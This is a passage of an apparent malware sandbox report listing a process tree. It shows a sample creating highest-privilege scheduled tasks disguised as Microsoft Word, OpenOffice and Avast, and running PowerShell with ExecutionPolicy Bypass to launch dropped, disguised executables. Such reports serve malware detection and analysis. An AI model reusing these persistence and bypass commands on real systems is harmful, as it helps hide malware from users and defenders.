                            Imagebase:0x7ff6d2ed0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:09:50:31
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0xf50000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
                            Imagebase:0x7d0000
                            File size:439'296 bytes
                            MD5 hash:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:20
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:09:50:34
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
                            Imagebase:0x7ff6d2ed0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
                            Imagebase:0xd00000
                            File size:439'296 bytes
                            MD5 hash:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\xdwdPutty.exe"
                            Imagebase:0x3f0000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            Has exited:true

                            Target ID:37
                            Start time:09:50:36
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:09:50:37
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:09:50:38
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:09:50:38
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:09:50:39
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:09:50:42
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:09:50:44
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0x900000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:09:50:46
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\xdwdPutty.exe
                            Imagebase:0x9a0000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:09:50:45
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:09:50:48
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:09:50:49
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:09:50:49
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0x290000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:09:50:52
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:09:50:53
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:scHTaSks /Run /I /TN "Avast Antivirus"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:09:50:54
                            Start date:03/07/2024
                            Path:C:\Users\user\xdwdPutty.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\xdwdPutty.exe
                            Imagebase:0x40000
                            File size:740'754'944 bytes
                            MD5 hash:8BBEF39EBACCBCCEF26BE354545B98BD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:09:50:55
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:09:50:56
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
